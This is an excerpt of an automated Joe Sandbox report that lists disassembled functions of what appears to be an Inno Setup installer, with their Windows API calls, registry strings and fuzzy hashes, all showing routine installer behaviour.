                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                          • String ID: Setup
                                                                          • API String ID: 291738113-3839654196
                                                                          • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                          • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                          • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                          • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                          • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A15940CurrentThread
                                                                          • String ID: RzE
                                                                          • API String ID: 1959240892-1126107055
                                                                          • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                          • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                          • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                          • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                          • API String ID: 3535843008-1113070880
                                                                          • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                          • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                          • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                          • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: CreateFile
                                                                          • API String ID: 2528220319-823142352
                                                                          • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                          • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                          • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                          • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                          APIs
                                                                            • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                          • API String ID: 2906209438-2320870614
                                                                          • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                          • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                          • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                          • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                          APIs
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2492108670-2683653824
                                                                          • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                          • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                          • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                          • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Append$System
                                                                          • String ID:
                                                                          • API String ID: 1489644407-0
                                                                          • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                          • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                          • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                          • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                          • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                          • 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570ObjectSelect
                                                                          • String ID:
                                                                          • API String ID: 1230475511-0
                                                                          • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                          • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                          • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                          • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 65125430-0
                                                                          • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                          • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                          • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                          • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                          APIs
                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                          • TranslateMessage.USER32(?), ref: 0042449F
                                                                          • DispatchMessageA.USER32(?), ref: 004244A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 4217535847-0
                                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                          APIs
                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Prop$Window
                                                                          • String ID:
                                                                          • API String ID: 3363284559-0
                                                                          • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                          • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                          • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                          • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                          • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableEnabledVisible
                                                                          • String ID:
                                                                          • API String ID: 3234591441-0
                                                                          • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                          • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                          • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                          • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: InitializeWizard
                                                                          • API String ID: 2558294473-2356795471
                                                                          • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                          • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                          • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                          • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-1019749484
                                                                          • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                          • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                          • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                          • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                          Strings
                                                                          • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: Inno Setup: Setup Version
                                                                          • API String ID: 3702945584-4166306022
                                                                          • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                          • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                          • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                          • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: NoModify
                                                                          • API String ID: 3702945584-1699962838
                                                                          • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                          • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                          • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                          • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 71445658-1109719901
                                                                          • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                          • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                          • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                          • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                          • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
